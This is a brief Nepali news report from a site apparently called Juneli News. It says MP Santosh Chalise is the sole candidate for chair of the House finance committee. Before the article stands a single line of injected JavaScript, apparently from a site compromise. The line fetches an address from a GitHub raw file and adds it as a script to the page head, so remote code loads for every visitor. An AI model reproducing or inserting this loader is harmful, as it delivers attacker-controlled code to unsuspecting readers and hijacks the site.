;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाडौं।
प्रतिनिधि सभा सदस्य सन्तोष चालिसेले अर्थ समितिको सभापतिमा उम्मेदवारी दिएका छन् । काठमाडौँ क्षेत्र नं. ३ बाट प्रतिनिधि सभा सदस्य चालिसे नेपाली कांग्रेस काठमाडौं क्षेत्र नं. ३ का सभापति समेत हुन् । अर्थ समितिको सभापतिमा चालिसेको एकल नामको उम्मेदवारी परेको छ। त्यसो त उनी अर्थ समितिको सभापति हुने पक्का भएको छ। भोलि समितिका सभापतिको सपथ ग्रहण गर्ने सचिवालयबाट जानकारी आएको छ ।
फेसबुक प्रतिक्रियाहरु